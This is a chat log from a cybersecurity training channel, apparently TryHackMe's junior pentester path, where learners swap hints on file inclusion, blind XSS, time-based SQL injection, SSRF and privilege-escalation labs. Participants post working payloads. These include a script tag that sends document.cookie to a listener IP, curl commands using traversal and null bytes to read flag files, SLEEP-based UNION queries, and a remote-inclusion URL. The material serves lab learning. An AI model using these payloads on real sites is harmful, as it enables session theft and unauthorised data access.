#junior-pentester-path

Gave +1 Rep to @deep scaffold

Q On Local File Inclusion 2:
Why if entering 4 times ../ in the query would result in an error message with 5 ../?

Local File Inclusion 2 Lab 3:
Looks like there is a bug in THM since it accepts the wrong answer. Even if you missed the ||%00|| at the end, you are right.

Where are you stuck?

Struck on flag3 i m trying get through it. But can't get that. If any help kindly appreciated.

@queen marsh flag 3 of which section / task?

File Inclusion Last task Q3

Why are you stuck, what are you running into

typically if you get a timeout, you need to restart the vulnerable machine

I am also stuck on the same task @queen marsh

File Inclusion > Task 8 Challenge > Flag3

the hint is "[Hint#1] Not everything is filtered! [Hint #2] The website uses $_REQUESTS to accept HTTP requests. Do research to understand it and what it accepts!"

did u find something?

I started a python server locally and downloaded the cve there but when I use wget on the vulnerable machine to get it, it says connection refused

Anyone help me out?

Not yet

databse name also ?

What's the full command you use with wget, so the URL you request?

wget http://machine_ip:port/cve

@shadow echo

Are you hosting that file on the attackbox or your own machine?

But if it's not only a typo in discord, you have to use it like wget http://machine_ip:port/cve

The file is on my local machine

So is the slash between machine_ip and :port only a discord typo or you entered it like that?

I used colon where did I show slash?

Well in the discord message up there it shows /:port. So are you connected to the thm vpn with your local machine?

Yeah I am

Use the techniques you used in both challenge 1 and 2.

Task 4 curl 2 requests, the curl command is properly typed in, I can’t get the green popup to say that the password reset email sent to attacker@hacker.com

there should be a terminate button in the lesson

Hi guys! I have just finished the Vulnerability Capstone room. But I am wondering about the last question. How did you guys get the flag. I saw that burp should be used. I changed my IP address but when i tried to execute the script I was getting errors related with the code such as Syntax error. So after many changes on the script I was able to get the flag trough the CLI. I didn't catch any request with Burp. So, did you pass the room as me?

Anyone else having an issue of the SSRF room's final task (SSRF Practical) not actually showing you can update your avatar?

You can either get a reverse shell and look for the flag, or have the exploit return the value of the flag, depending of the script you used

@tall rain I just updated my avatar. did you create an account and then navigate to /new-account-page ?

Hm.... so weird. Yeah, clicked the link, tried changing the URI manually. I'll try to reset the box. Thank you!

I changed the url manually and it worked for me

Yeah I tried with reverse shell. But it wasn't successful...

Hi! I couldn't pass the LFI PHP filter examples in lab 5. Somebody help me please 😄

what have you tried so far?

i tried subject example :lab5.php?file=....//....//....//etc/passwd

but still gives me error

like :

Warning: include(includes/../../../etc/passwd) [function.include]: failed to open stream: No such file or directory in /var/www/html/lab5.php on line 28

Warning: include() [function.include]: Failed opening 'includes/../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/lab5.php on line 28

You'd be surprised

@sharp yoke review what you entered in.

exactly where ? :/

review the file=....//....//....//etc/passwd section

😄 yeah I stuck there exatly :d

yes, look closely.

you almost have it.

you made a mistake.

okay

So how many traversals you have to do indicates that message ? /var/www/html/lab5.php on line 28

3

No

what :d

wait

oops /. ...

4 ?

Try it

ow yeah 4!

thanks

not gonna lie, i went down the wrong rabbit hole, what you provided us had spaces after the //

didn't even think about the number of traversals lol.

😄 yeah me too

I try this btw

that was just me hinting at the spaces in your file= line

:p

😄

Hi.
In the auth bypass room logic flaw challenge, how do I create an email for myself?

@hollow zephyr when you create your account and it asks for email, use your username@customer.acmeitsupport.thm

you don't need a functional email, but using that will allow tickets to be sent to your accounts ticket inbox

@brazen notch Thank you so much. That worked.

Gave +1 Rep to @brazen notch

I'm completing protocols and servers room it has a task to retrieve a flag by connecting to telnet I tried various ways but I'm getting bad request error

how exactly do we need to frame a request

@analog quartz did you add host: telnet

after the GET request?

I dont see it in your screen 😉

ahhhhhh yesssss

thankyou

yw 🙂

hi could someone please give me a hint as to why this is happening? Metasploit: Meterpreter last question

Anyone got any good stuff from the tickets?
Good = Vouchers, Pineapple, Premium month

knowledge, i gained knowledge..... thats about it

knowledge is one of the most profitable and important resources that is out there

Did you give the machine enough time to fully boot up before trying to run that?

i did

its been rtunning 20 minutes

Do you have a LHOST option for that one? As 10.0.2.15 doesn't seem to be a valid VPN IP, so for your own machine.

hahaha

good god

what a fool

its been a long day

all sorted, thank you

on winprivexec is the dllsvc service missing? task 5

Hello. I am stuck in challenge3 of file inclusion room. Any help?

what tool did you use for I think task 2

Is this path enough for eJPT?

are you asking me?

yes sorry

Can I get some help with Task 8 in XSS? The blind-xss practice?

I set up a nc listener using the following rlwrap nc -lvnp 443 and used the payload described in the lesson, but I'm not getting any data.

think outside the box, and by box I mean browser

I am already on burp XD

thats where I got stuck for a while

any other tools you might use?

I am checking different payloads from github

no luck

because numbers and symbols are filtered

what about a tool from the terminal?

trust me I know exactly where you are

I was stuck there for like an hour

you want me to use curl?

Im trying to hint you to it without saying it

😉

ok!

let me try

bumping this.

But the filters will filter even on curl

I completed whole introduction to web hacking module except this XD

and playground

did you research the $_REQUEST?

I did but the explanation was vague

very vague

well it uses GET POST and HTTP HEADER

what kind of request are you sending with curl?

simple curl request

so simple uses GET, maybe try another way

I had no issue when I used the example of just "nc -nlvp 9001"

ok let me see

</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script> is the attacker IP supposed to be like x.x.x.x:443/?cookie or x.x.x.x:443?cookie

I tried both and had no results.

I did it with
</textarea><script>fetch('http://x.x.x.x:9001?cookie=' + btoa(document.cookie) );</script>

okay so the / is needed, but that's not in the lesson, probably a typo.

but i've tried both ways and it's still not giving me anything

no slash

sorry discord adds that

okay.

Well, now this is interesting.... Dev tools outputs the cookie, but I don't receive it in my NC listener

Thank you!

Gave +1 Rep to @night hearth

for the challenges ive done almost everything with curl

im stuck on flag 2 as well

@night hearth i've tested and made sure that i'm receiving connections by accessing the ip:port combo in the browser. but, when i submit the ticket with the payload, and open the ticket for the payload to execute, i do not receive any response.

i got one and the playground RCE

I stuck the LFI Task 8

havent found 2 and havent tried 3

the playground RCE was the easiest for me im struggling on the challenges as well

@sharp yoke @wet gulch for task 2 when using curl, you need to look at the cookies.

I dont think I even had to open the ticket. As soon as I send the request I received the cookie in netcat

interesting.

yeah I set cookie for admin but then I stuck immediately

@brazen notch

look at the curl output after you set the cookie

yes i know challenge 2 requires cookies the problem is ive tried 100 different cookies to try to get the file and im failing

i have seen the admin page and can get that

do you see something that resembles the lessons information like includes/Admin.php

exactly where im at

yeah me too 😄

ive tried curl burp its all the same just cant figure out the syntax to get the file

i tried includes/../../../etc/flag2 but it didn't work

ive tried cs_lang=../../../etc/flag2

i tried coockie-set

or just ../../../ or ..../..../..../

i tried url encoding

does the input expect a file type?

there is no input in Task2

one second, let me load up that box again.

Do you complete task 1 ?

I’ve basically tried brute forcing the cookies but I can’t seem to find which cookie retrieves the file

Yes

Just stuck on task 8 flag 2 and 3

linux privesc last challenge where the hell is flag1.txt??

You got me here…

you too stuck there?

No, I just barley started the course, I’ve done a few other pen testing things but I’m taking this course right now, only on file inclusion

oh okay

anyone?

Okay I'll wait for you thanks

Gave +1 Rep to @brazen notch

Did you need help on task 1?

yeah I stuck everywhere 😄

@wet gulch @sharp yoke okay, i just redid challenge 2, when you curl the page, setting your cookie to something other than guest, you should see an error output

Yes

copy paste the "failed opening ....." error here

It’s case sensitive also

Admin and admin pull 2 different answers

Results rather

that isn't important for the challenge

what's important is the error message

Yes

copy paste the error message

It says includes/Admin.php

exactly

I’m away from my pc for 2sec

I don’t understand these file paths in the file inclusion section

if you put in --cookie "THM=shark" the output will be includes/shark.php

Okay that makes sense

I’ve been trying to add another cookie like cs_lang=

that means it's expecting the .php filetype.

Or others

Okay

the lesson taught you how to evade filetypes.

do you remember how?

%00

nope

correct

null byte chararcter

aah okay

😄

Lol I understand everything but how you get it to a cookie but this helps

did you use curl to modify your cookie?

Yes

-b

I was not going to ask and wanted to solve this myself but the commands seems correct on the "Authentication Bypass" to get the username/password for the answer but the output shows me nothing. Am I missing a step or.. ?

I don't understand the "--" thing

curl "http://MACHINE_IP/challenges/chall2.php" -b "THM=admin; cs_lang=../../../etc/flag2%00"

its an option you add to the curl statement

type curl --manual into your terminal

yeah, you're overthinking it a bit :p

i see

thank you @brazen notch

Gave +1 Rep to @brazen notch

np, if you want more help i can try, i'm trying to avoid just giving you the answer

im close

no thats fine

my reading comprehension sucks honestly so i dont get everything but i get most

when i first went through it, i realized i had to use the --output - flag at the end of my curl statement

I give error 502 -_-

most these are in binary right and wont display to the console/

?

when you start using the %00 yes, you'll need the --output -

output to file

that too

@night hearth i'm still lost about why i can't get the cookie in my nc listener lol

you still got the flag didnt you?

well, i had to look at error output in my dev tools

oh so you just want to go back and do it the correct way

yea

You should cross check your wordlist location

so replacing the {URL_OR_IP} with your attackbox IP and nc listener port just isnt working?

Correct.

OK but now I got disconnected. 😦 and still 50+ min left. Trying to get back on but won't let me.

why cs_lang ?

</textarea><script>fetch('http://x.x.x.x:9001?cookie=' + btoa(document.cookie) );</script> @night hearth

Try reconnect

curl "http://MACHINE_IP/challenges/chall2.php" -b "THM=../../../etc/flag2%00;" --output /home/kali/Downloads/lfiflag2.txt @brazen notch im still not getting the file

@wet gulch you're close, it's expecting a filetype.

Tried 3x so far. Nothing.

NC might not work! Try attackbox

I stuck task 1 😐

please help

in the cookie or as a curl option?

in the cookie.

Terminate your machine and connect again

was that a copy/paste? it should be btoa(

err yea it's btoa wasn't copy paste

i typed it out from the inspect element portion

Which room?

LFI

Task 8 challenge 1

You can share your problem here

how can ı send o file parameter with post request ?

@sharp yoke with curl.

Yes

curl -X POST -d 'data' 'target'

you can also use devtools or burp

I tried devtools but I couldn't send a file

How do you try?

@sharp yoke have you looked through https://tryhackme.com/room/webfundamentals

@steel nymph my friend

at the beginning of task 8 it says familiarizing yourself with HTTP Web Basics will help you copmlete the challenges.

I open the network section and right click and i click edit and resend

yeap

check this then : https://www.w3schools.com/tags/ref_httpmethods.asp

you add the file type after the nullbyte? @brazen notch

Y

There is another way to change page source and resend from dev tool

Failed again... I'll just clear cookies/cache, and go from there.

number of traversals :p

devtools sucks 😄 or I couldn't with it

Dev tool is a great place to start and learn

I solved task 1 😄 @wet gulch

Finally !

yeah I stuck again in task 2

Didn't work... after clearing cookies and cache, nothing.... is there a problem on the site's VMs Attack Machine or... ?

Im stuck on Burp Repeater Task 7...

i cant get 500 response, i just keep getting 404s

If you open the ticket manually, are you getting your own session cookie? Oh nvm, you are not at that room 😄

What are you facing exactly. Can you show us?

Try read the hints carefully

Are you trying to open attackbox or vm?

I didI have tried text, large numbers, 0, symbols, and combinations of all of them.

Or you can't access thm at all?

Did you read the hints?

yea the hint is "The idea here is to enter unexpected inputs to see how the server will react. For example, instead of a number you could enter a piece of text, or a symbol. Alternatively, you could try entering a number greater than the number of products available (e.g. 1000), or a number less than or equal to 0."

Read a loud to yourself

Got it?

trying to open the attackbox.... nothing is working... it's because fuff is installed and other things that isn't ready on my own Kali. Maybe I should set it up.

no I have tried all of that, I feel like I am doing something wrong here

Are you using any kind of vpn?

curl -X POST --cookie "THM=Admin" http://10.10.176.3/challenges/chall2.php -H "Content-Type: multipart/form-data" -F "file=includes/../../../../etc/flag2" didn't work

that's because what you entered is incorrect.

Read a loud the last line of the hints

where exactly ?

remove everything at the end, and look at the response you get

You should mark it as spoiler when you post any kind of solution here

nvm

lmao

:spoil:

how do you do the spoiler tags? lol

well it was the wrong answer so I didnt think it would be a spoiler

Can't it be a minus figure?

Like -1099?

thanks. I think I have done one to many modules today

Gave +1 Rep to @viral token

Less then 0 might not be minus always

I could have sworn that I had tried that already, but apparently not

more specifically remove everything from -H onward.

Nope you did not. Take a break.... It will come to you easily

yea I got it when I said nvm. as soon as I looked at what I posted

You should hit the exact url <0 is not a valid url

Do you want to see the spoiler? Or you want to solve your self?

no I solved it lol

Good

easy question guys!!! on meterpreter, i use pwd and see i am on C:\Windows\system32...... how can i go back, need to move to C:\Program files (x86)

which command should i use

https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

cd.. doesn't work, and cd C\Program files (x86) neither

It will work if you do it correctly

hate to be a newby :DDD

holly shit!!! was the fucking slash.... seriously???

lol

ty ninja

I really really recommend googling before asking

i did for sure,,,

sorry anyway

i'm still stuck on this blind-xss challenge.... the page is throwing a network error when i'm trying to point it to my NC listener, but I validated it can receieve connections via my browser... can anyone help me figure this out?

oh, my god, nevermind >.<

SSL was preventing the connection.

were you putting https:// in your attack?

no

but the lesson said to visit the vulnerable site at https://vulnerablesite.thm.com/customers/

it doesn't work with SSL anyway.

i guess it was probably an oversight by the creator of the lesson?

if SSL is on, CORS policy blocks the transmission of the cookie to the NC listener.

Is there a way to overcome that?

Having issues with Blind SQLi - Time Based challenge. I have found a table and determined the column names of the table but am unable to run the query to get the values from the table.

What you got? Send with spoiler tag

Nope. Not connect on VPN.

No worries. I try later after I have dome grubs.

Did you try restart your machine and/or network?

That's my net step... I was talking to my colleague on a project. Didn't restart yet.

Try with vpn/proxy than

The table I found was ||analytics_referrers|| and i found it to have || 2 columns id & domain ||

With this info I changed the query to end with || UNION SELECT SLEEP(5),2 FROM analytics_referrers;-- || I have also tried it with || where domain like '%';-- || at the end of it but all fails.

Are you sure there are not more than one table?

I am sure there is more than 1 table. And I know this could be the wrong table I need to complete the challenge but am concerned with the fact I am unable to retrieve the information from that table to begin with

Try to get the other table and dig there

!= Do you know what does it mean?

@night hearth hey man, sorry to pester you again, but i actually think i am completely lost. i figured out what i was doing wrong for the nc listener, but i'm blanking... that session cookie that i'm getting is my own... do I need to use auth bypass in this module to get the staff-session cookie?

Other table was simple enough as it was predictable
|| table: users - columns: username, password, id ||

but even with this as soon as I try to run through and figure out || username || from the query everything fails

I do it the same way as the challenge before with

|| UNION SELECT sleep(5),2,3 FROM users WHERE username like 'a%';-- || but everything fails

hello

What document defines how a penetration testing engagement should be carried out?

what is answe

the answer is in the section that asks that question.

||what is the ROE?||

yes

I tried many answers no thing right

Just google it... this is not hard and an important step for penetration testing.

Is anyone around to help with XSSGI Task 8?
I've confirmed my payload works and sends my own session cookie to myself over netcat if I open up the ticket, but it's as if the automated staff session isn't opening the ticket for me to get the staff-session cookie.

Try restarting the target machine and do it again, it's a bit buggy. Maybe giving the target machine 5 mins to fully boot before creating the ticket helps, but not sure.

@shadow echo yeah... i've been stuck on this for 2 hours, i just restarted the machine about 15 minutes ago, went through the entire module again before trying the payload..... I'll give it another shot.

Have you tried it with the request catcher or on the attackbox(in case your are not already on the attackbox) already?

@brazen notch I just ran through it again and everything worked fine

does the name of the support ticket matter?

the payload goes in subject

yeah i got that.

oh wait

uh

uh

No the payload doesn't belong into the subject field, that will lead to getting your own session cookie immediately.

? I just did it in subject and when I decoded the cookie I got the staff session cookie that the task accepts as correct

Well I don't know, maybe you were lucky that whatever triggers the ticket to be read as staff was faster. But as the subject of the ticket is displayed in the ticket overview, the payload gets executed as soon as you get redirected to that ticket overview page. Already was helping someone who did exactly that and he was wondering why he always got his own session cookie.

It's not working with the request catcher either D:

this machine hates me lol

Before restarting the machine, are you always checking if it's working if you click on the ticket?

yeah, my current payload is

||</textarea><script>fetch('44715acd542996ee53c87fb7dafbf148.log.tryhackme.tech?=cookie' + btoa(document.cookie));</script>||

wait a sec

-_-

fixed it -_-

i got it working with the request catcher, but can't get it working with my nc listener.

Hey anyone around to help me with the LFI challenge lab? I am doing #1 and I can't really work out what I am doing wrong. It's probably something stupid but it's driving me up the wall 😂

@midnight charm i can help

what tool are you using?

So I'm currently using burp repeater to edit and resend the post request

hm, i didn't use burp as i'm not too familiar with the tool yet, are you familiar with curl?

Not as much but I have used it a few times in the past, give me a sec and I'll see how that goes

whichever tool you're looking at using, make sure that you're using the right HTTP request

GET vs POST

I am definitely using post requests but I think I might be messing up in someway of the format of the request/query. Curl may make it a bit simpler though

what does your current request look like

Am I allowed to post screenshots in here of this or is it best to dm?

you can dm me

!docs verify

After that you can post screenshots

Got it now! thanks @brazen notch . I was being dumb with my burp request formatting lol

Gave +1 Rep to @brazen notch

Awesome! 🙂

Just a question about the Command Injection Lesson... I can get the different commands to work and gather data about the system, but would it be possible to establish a reverse shell via this vulnerability? I don't see anything that would do that on the payloads github it provides. I've been fiddling around with using nc to connect back to my listener for experimentation and sometimes i get the connection established but it's a dead shell. Other times it doesn't connect.

I also tried setting up a bind shell to which doesn't work as well.

aww man

Authentication Bypass Task 4, how do you do the curl request 2 ? to get it to say "we'll send you a reset email to attacker@hacker.com" ? Cause it's not saying that for me

file inclusion, task-4, I have done everything to get the answer but nothing seems working. anyone help?

@pallid mist check your address bar and tinker with it

Command injection task 5.Which one of the thousand payloads would I run hmmmm
https://media.tenor.com/images/9e1debd82db1bb8099adba54e136bf33/tenor.gif

I have a question. When it comes to LFI, why is it like this =../../../../etc.passwd and not just like this =../etc.passwd? What's the point of so many ../../../../?

Because you need to move up tit he root directory of the machine

The directory you start in is /var/www/html

If you do ../etc/passwd

You're doing

/var/www/etc/passwd

You need to do one ../ for every directory you want to move up

Whatcha mean?

derp...

ty Ill remove my posts lmfao

ah shit

its still in bug report

thank you! @modest arch

Gave +1 Rep to @tulip elm

I had it in the wrong room, anyways.

If you are putting in a key for the SQL room, make sure you move to the next stage first. Otherwise you are entering your key for the previous question..

Kinda silly mistake, I made it, sure I wont be the last. If you are having the same issue, hopefully you see this post xD

Anyone here able to solve LFI challenge 1?

Im using burp to send a POST request

With file=../../../../etc/flag1

But it doesn't seem to work

I feel like im in the right track or am grossly over looking some detail in the code

@chrome sand I just got done with challenge 1-3. I don't want to give anything away so lets start with a question: How are you sure you need to go back 4 directories?

and sorry are you talking about the challenge 1 or Lab 1?

so the error it throws me is telling that im in /var/www/html/chall1.php

so to hop out that is 4 directories no? or am i seeing this wrong

challenge 1

by this this is still Spartello

had a different account on another device lol

It says "The input form is broken!" when I try to burp it or click the "include" button I don't get errors. So for me, I never got any errors to tell me where I was located.

I was able to get the flag by using a CLI tool and not through burpsuite.

ah okay, makes sense im a little more familiar with Burp so was comfortable using the repeater tool

but i guess im doing something wrong

it's throwing an error so i guess im somewhat on the right path

but super lost on the directories now

If you need a bit more of a hint as to what tool you can use, check out the HTTP Web basics link and brush up on POST requests 😉

Yeah i actually did that earlier too haha

so it was using the curl command

maybe ill give that a shot

also the number of DIRs you need to move is in the error line ||(include_path='.:/usr/lib/php5.2/lib/php')|| not the /var directories

on linux server its a usual location var/www/html

am i right @zealous marsh ?

which tools are you using?

I'm checking something @viral token I might be wrong about something. I'm doing some testing to be sure

oh, okay

Okay yeah I was right. Did you check my post about the error line? The directory you need to move is from the ||include_path|| string. If you base is off the /var/www/html dir you won't move back enough to get back to root.

||challenges>html>www>var>root>etc = ../../../../etc|| @zealous marsh

hmm see from my understanding of the reading Task 4 it was because the include function is calling from a different directory.

aye

oh so it's like "cd .."

I am doing burpsuite the basics room and stuck in Task 9

Read through the options in the right-click menu.

There is one particularly useful option that allows you to intercept and modify the response to your request.

What is this option?

which option and which submenu is he talking about exactly?

I believe it's referring to the send to repeater option @empty forge

I haven't gotten that far yet though so I could be wrong.

no it is not right

Possibly Proxy>Intercept then? Other than that idk. I'd have to get to that room and task to know to be sure but I'm about to hop off for the night. Maybe someone else here can help.

I got the answer

This question was not clear

hey i am doing Linux prevEscl room in the jr. pentest path but the machine is not connecting via given credentials through ssh

anyone knows whats the issue

I think you should check your vpn

it s working fine as you can check ping command in pic

Try using the web browser attack box and see if you have the same issue.

It's about intercepting the response I think

File Inclusion > Task 8 > Challenge 4

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

What?
Am I supposed to launch my own server to host a text file with a command or something?

A bit like that. Have you read up about RFI?

Only the bit in Task 6
Which is...
Overly simplified and barebones

RFI is just like LFI, except instead of a local file it's a remote file

So instead of ../../../../something.php etc, you might specify http://attacker/GiveMeShell.php

So that last sentence is half way there

Whoever said use burp, I didn't use burp for any of these tasks, so no you don't have to

Nevermind, I was thinking about lab3 not playground.
Yes in playground you have to use a file stored somewhere else

Didn't use burp for that either

Burp is just the shortcut tool you're not supposed to know how to use yet. Everything so far has been doable in browser. That's why I'm so confused with this.

Other protocols are available™️

i did not use burp either. you have to create a php file

How did you manage to do it without burp (or any other software)?

Curl

If you mean task 3, yeah curl

Yep task 3. I thought you did it by simply input the url 😁

Command injection task 5.Which one of the thousand payloads would I run? 👀 I'm a grandpa. Hehe

Check the TXT records of thmlabs.com. What is the flag there?

I am trying nslookup but thmlabs.com does not exist

I am doing passive recon room

Well check task 3 to see on what shell operators the site may reacts to.

Can anyone help me?

What's the full command you try? As it works just fine for me

nslookup -type=txt thmlabs.com

I also tried to ping to thmlabs.com. did not work

That works just fine for me, what's the reply you get with that command?

Copy paste the full reply pls or send a screenshot

It worked suddenly XD

Uhm, okay ^^

Anyone with hints on the challenge 3 of File Inclusion 👀. I'm kinda dry on ideas

@shadow echo thanks Fontaene going to try that

Gave +1 Rep to @shadow echo

user@AttackBox$ traceroute tryhackme.com
traceroute to tryhackme.com (172.67.69.208), 30 hops max, 60 byte packets
1 ec2-3-248-240-5.eu-west-1.compute.amazonaws.com (3.248.240.5) 2.663 ms * ec2-3-248-240-13.eu-west-1.compute.amazonaws.com (3.248.240.13) 7.468 ms
2 100.66.8.86 (100.66.8.86) 43.231 ms 100.65.21.64 (100.65.21.64) 18.886 ms 100.65.22.160 (100.65.22.160) 14.556 ms
3 * 100.66.16.176 (100.66.16.176) 8.006 ms *
4 100.66.11.34 (100.66.11.34) 17.401 ms 100.66.10.14 (100.66.10.14) 23.614 ms 100.66.19.236 (100.66.19.236) 17.524 ms
5 100.66.7.35 (100.66.7.35) 12.808 ms 100.66.6.109 (100.66.6.109) 14.791 ms *
6 100.65.14.131 (100.65.14.131) 1.026 ms 100.66.5.189 (100.66.5.189) 19.246 ms 100.66.5.243 (100.66.5.243) 19.805 ms
7 100.65.13.143 (100.65.13.143) 14.254 ms 100.95.18.131 (100.95.18.131) 0.944 ms 100.95.18.129 (100.95.18.129) 0.778 ms
8 100.95.2.143 (100.95.2.143) 0.680 ms 100.100.4.46 (100.100.4.46) 1.392 ms 100.95.18.143 (100.95.18.143) 0.878 ms
9 100.100.20.76 (100.100.20.76) 7.819 ms 100.92.11.36 (100.92.11.36) 18.669 ms 100.100.20.26 (100.100.20.26) 0.842 ms
10 100.92.11.112 (100.92.11.112) 17.852 ms * 100.92.11.158 (100.92.11.158) 16.687 ms
11 100.92.211.82 (100.92.211.82) 19.713 ms 100.92.0.126 (100.92.0.126) 18.603 ms 52.93.112.182 (52.93.112.182) 17.738 ms
12 99.83.69.207 (99.83.69.207) 17.603 ms 15.827 ms 17.351 ms
13 100.92.9.83 (100.92.9.83) 17.894 ms 100.92.79.136 (100.92.79.136) 21.250 ms 100.92.9.118 (100.92.9.118) 18.166 ms
14 172.67.69.208 (172.67.69.208) 17.976 ms 16.945 ms 100.92.9.3 (100.92.9.3) 17.709 ms

what is the IP address of the last router/hop before reaching tryhackme.com?

What would be the answer?

In my knowledge, It should be 100.92.9.118

But that's not right answer

can anyone tell me the answer with reason?

check hint and do a little research

I did lol i wouldn't be asking if i didn't XD

I thought you are asking lol

so I replied

it's ok

try curl

or post request method on burp

They might work

I did used a post request in the body

but as with @viral token i have no more error but neither to i see any flag

try get param as well as post param

same for both

I used a POST request with the body of || file=../../../etc/flag3 || and a URL request with || chall3.php?welcome || and now i need to get rid of the response doing || flag3.php ||

Working

Got It

Congrats

user@AttackBox$ traceroute tryhackme.com
traceroute to tryhackme.com (172.67.69.208), 30 hops max, 60 byte packets
1 ec2-3-248-240-5.eu-west-1.compute.amazonaws.com (3.248.240.5) 2.663 ms * ec2-3-248-240-13.eu-west-1.compute.amazonaws.com (3.248.240.13) 7.468 ms
2 100.66.8.86 (100.66.8.86) 43.231 ms 100.65.21.64 (100.65.21.64) 18.886 ms 100.65.22.160 (100.65.22.160) 14.556 ms
3 * 100.66.16.176 (100.66.16.176) 8.006 ms *
4 100.66.11.34 (100.66.11.34) 17.401 ms 100.66.10.14 (100.66.10.14) 23.614 ms 100.66.19.236 (100.66.19.236) 17.524 ms
5 100.66.7.35 (100.66.7.35) 12.808 ms 100.66.6.109 (100.66.6.109) 14.791 ms *
6 100.65.14.131 (100.65.14.131) 1.026 ms 100.66.5.189 (100.66.5.189) 19.246 ms 100.66.5.243 (100.66.5.243) 19.805 ms
7 100.65.13.143 (100.65.13.143) 14.254 ms 100.95.18.131 (100.95.18.131) 0.944 ms 100.95.18.129 (100.95.18.129) 0.778 ms
8 100.95.2.143 (100.95.2.143) 0.680 ms 100.100.4.46 (100.100.4.46) 1.392 ms 100.95.18.143 (100.95.18.143) 0.878 ms
9 100.100.20.76 (100.100.20.76) 7.819 ms 100.92.11.36 (100.92.11.36) 18.669 ms 100.100.20.26 (100.100.20.26) 0.842 ms
10 100.92.11.112 (100.92.11.112) 17.852 ms * 100.92.11.158 (100.92.11.158) 16.687 ms
11 100.92.211.82 (100.92.211.82) 19.713 ms 100.92.0.126 (100.92.0.126) 18.603 ms 52.93.112.182 (52.93.112.182) 17.738 ms
12 99.83.69.207 (99.83.69.207) 17.603 ms 15.827 ms 17.351 ms
13 100.92.9.83 (100.92.9.83) 17.894 ms 100.92.79.136 (100.92.79.136) 21.250 ms 100.92.9.118 (100.92.9.118) 18.166 ms
14 172.67.69.208 (172.67.69.208) 17.976 ms 16.945 ms 100.92.9.3 (100.92.9.3) 17.709 ms
what is the IP address of the last router/hop before reaching tryhackme.com?
What would be the answer?
In my knowledge, It should be 100.92.9.118
But that's not right answer
can anyone tell me the answer with reason?

Which room is that?

active recon room

traceroute task

Normally it would be the 100.92.9.3

But depends if the router is replying to ICMP request

can you explain more

because here I think we are getting replies

Also 100.92.9.3 is not answer

Basically the traceroute is a malformed type of ICMP (ping ) request with a TTL at 0

Check google on how traceroute is working

Sometimes you need to open it in a new tab to see the results

It worked without the need to open a new tab

Thanks

Gave +1 Rep to @viral token

The last router before reaching tryhackme will be in the last line. If you check Traceroute A's last line, you get 2 IPs, so therefore it took 2 different routes on the last hop to tryhackme, as by default traceroute will do 3 probes(Iirc). The answer will be the first IP address that responded, like the hint says.

Y'all just teasing me now.

Can someone be kind enough to give me a hint to how to get a ssh server header without a login, for net sec room
No need I got it, was over thinking it as usual

so lucky

I'm working on this same challenge, but every time I modify the requests in burp suite, it just times out:

All that I modified is ||changed it to post, and added the file=../../../../etc/flag3||

In the POST request you should add the the parameters not in the request but in the body + should add something in the requested URL || that's a php script present on the challenge 3 website ||

I didnt used burpsuite for that

i just needed the Dev tools and modify a GET request to POST and change some parameters

kk, ty I'll try that

np

Anyone can help for SQL Injection room Task 8 please ?

yes, it is, so whats wrong you facing?

I said earlier that i'm done with this XD

oh yes, you are!

Just trying to help 😛

Was helping me

thats good! a little help all we need here....

I was tired around 12hrs and someone helped me too!

Now i'm stuck on SQL injection task 8 x)

hi! i have a ssrf question. why we are using x in the "x/../private" ? I don't understand the x meaning

okay, you can tell me where you got blocked! @flint smelt

I have 2 tables names || analytics ||and || users || the problem is that i can't get the column name i used the previous command from the task 7 but i'm so shit in SQL || headache incoming || ahaha (and the database name as well)

its clear that you need to dig table 2

and, how you trying to dig for database name?

as well as tables.

Yeah i tried to use || https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'my_letter%';||

and 1st table is not done yet

where do you get ||sqli_three||!

I mean i have the database name from guess and verifiction since it was || sqli_three|| is used || sqli_four ||

as I remeber there is no ||sqli_three|| on that task

Task 7 there is

yes, you should use the 2nd one, but, try to dig, not guess

And since we just replace the boolean by time based i adapt the previous given commands to time based

I guessed and verified with || https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'sqli_four%';-- ||

read this... a suggestion from a friend... this post helps me a lot
https://www.mssqltips.com/sqlservertip/5670/examples-and-function-for-using-sql-server-like-operator-and-wildcard-characters/

I just verified there is no other ddb

so in this ddb i foud there the 2 tables i have mentionned before

||four|| is the right answer.... and 1st table has not end yet, if you tried to find the lost part of 1st table you will learn something. and you need to dig table 2 using db 4

Yeah i saw

i removed the %

and it appears it's not sleeping 5s

so it's not finished yet

try to find out the rest... let me know if you need spoiler...

% is enough to complete the rest or i need another operator ?

% is enough

Ok thx

Gave +1 Rep to @viral token

The Windows privesc room seems to be broken, the unquoted service wont start whatsoever no matter the method used to start it and the reverse shell will only last about 5 seconds

I found my problem, Meterpreter shells simply don't work

make sure to use the msfvenom cmd the task uses

my bad xD

so LFI task 4 iv gotten the lab to dump out etc/passwd but it wont accept my answer .. some one give me a little help here

nevermind helps when u actually read whats infront of u

-f exe-service is a good trick too

hope you got it by now!

Hey guys, isnt the attackBox for LinuxPrivSec task 7 working?

from the jr pentester path

its just reconnecting. fails to connect

did anyone complete the xss lab?

i stuck in last part i am listening the port but i didn't recive anything

@steel nymph

could you help me please ?

hi guys I just won a 3€ voucher through the event, I don't think I should ever order anything so I'm sharing my voucher with the community^^ have fun: rDKU4KAkPh

</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

yes

sir @steel nymph

nc -nlvp 9001

<script>fetch('http://10.10.133.109?cookie=' + btoa(document.cookie) );</script>

no i see nothing

here

i dont see in my website running which port ?

80?

nope

should i listen 80 ?

yeah finished the room now lol

going to start SSRF after dinner

Hey what should I do I completed all the free rooms in jr pentester path but I haven't got free premium voucher

:(

how can I send ?

It's time to subscribe

@sharp yoke I think you need to visit google, or revisit the HTTP Web Basics, no offense sir.

😄

Hey everyone, I am working on the file inclusion lab and on task 8 (Challenge) and Flag3.
I am stumped on what to do here. I've tried specifying the $_REQUEST in a POST message and messed around with the filters. I constantly get "Failed opening '.php'" message.

I am not sure what I am doing wrong here and was hoping for a hint. I've read through some of the other comments but no luck.

Look to implement both techniques you used in challenge 1 and 2 as well.

Ah, that got it. I don't understand how I missed this.... 😩

